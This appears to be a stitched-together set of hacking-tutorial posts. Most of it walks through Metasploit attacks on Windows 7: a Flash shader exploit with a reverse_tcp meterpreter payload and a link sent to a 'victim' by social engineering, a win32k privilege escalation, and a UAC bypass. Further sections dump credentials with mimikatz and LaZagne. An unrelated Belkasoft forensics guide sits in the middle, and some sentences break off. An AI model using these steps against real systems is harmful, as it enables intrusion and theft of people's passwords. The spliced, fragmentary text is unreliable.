Hack Remote Windows PC using Adobe Flash Player Drawing Fill Shader Memory Corruption

This module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash, Windows 8.1, Firefox 38.0.5 and Adobe Flash, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash

Exploit Targets
Windows 7

Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/windows/browser/adobe_flash_shader_drawing_fill
msf exploit (adobe_flash_shader_drawing_fill)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_shader_drawing_fill)>set lhost (IP of Local Host)
msf exploit (adobe_flash_shader_drawing_fill)>set srvhost
msf exploit (adobe_flash_shader_drawing_fill)>set uripath /
msf exploit (adobe_flash_shader_drawing_fill)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link ( a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

Forensics Investigon of RAW Images using Belkasoft Evidence Center

First of all, download the Belkasoft Evidence Center ultimate from this link.

Click on New Option to select the Raw Image.

Enter the Case Name.
Select the Root folder where Forensic Evidence will be created.
Then type the name of the investigator and Case Description. Click Ok.

Now select the Raw Image and Check the Option Analyze Data Source. Click on Next.

Now Select from supported data types and click on Next.

Now Select all and Click on Finish.

To visualize the cached sites exactly as seen by the user, Click on Cache in Browsers option

To see Downloaded file list, click on Downloaded Files.

To Check the List of Sites Visited by the user, select Sites Option.

To see Cookie List, Click on Cookies Option.

Now click on Documents option and Then Select Found Documents option to see all the office Documents files found in user pc

To see all the encrypted files, click on Found Encrypted files option.  It will detect   more than 150 types of encrypted files. It is also possible to decrypt all these encrypted files with in this product by installing Passware   kit Forensic integrated with Belkasoft Product.

To Find Picture List, Select Found Pictures in Pictures Option. To Detect Forgery in Picture.  Right click on Picture, Select Analyze Pictures and Click on Detect Forgery Tab.

To find the recent files opened by Acrobat Reader, Click on Adobe Acrobat Reader Recent Option.

To See Recent applications run by user, Click on Last Application and Paths in NTUSER.DAT Option. NTUSER.DAT is a registry file in Windows Operating System .Every user profile contains an NTUSER.DAT file.  It contains a unique Documents Folder, Start menu Configuration, Desktop properties and browsing history.

To see last Selected Files by the user, Click on Last Selected Files.

To check the recent files opened by user, Click on Recent files option.

To detect latest searches by the user, click on Searches option.

To find the latest accessed files by the user , click on Recently accessed documents.

Hack Browsers, Chat, Databases, Mails, Wifi Password in Remote Windows or Linux PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Now download LaZagne project from here and extract in your pc. You can find the lazagne.exe file in folder.

Now use the upload command to send a file to the target system.

Launch all modules type laZagne.exe all will dump all the passwords that it can find all saved password in Google chrome

You can see windows secret passwords

You can see all saved wifi profile passwords

Hack Remote Windows PC using Windows Client Copy Image Win32k Exploit

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64..

Exploit Targets
Windows 7

Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms15_051_client_copy_image
msf exploit (ms15_051_client_copy_image)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_051_client_copy_image)>set lhost (IP of Local Host)
msf exploit (ms15_051_client_copy_image)>set session 1
msf exploit (ms15_051_client_copy_image)>exploit

Hack the Password in Plain text of Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you had a remote shell with Metasploit all now use the Bypass UAC module, set the session number and exploit it

 use exploit/windows/local/bypassuac
msf exploit (bypassuac_injection)>set session 1

msf exploit (bypassuac_injection)>exploit

mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory.

Now type load kiwiThen type, “creds_all“: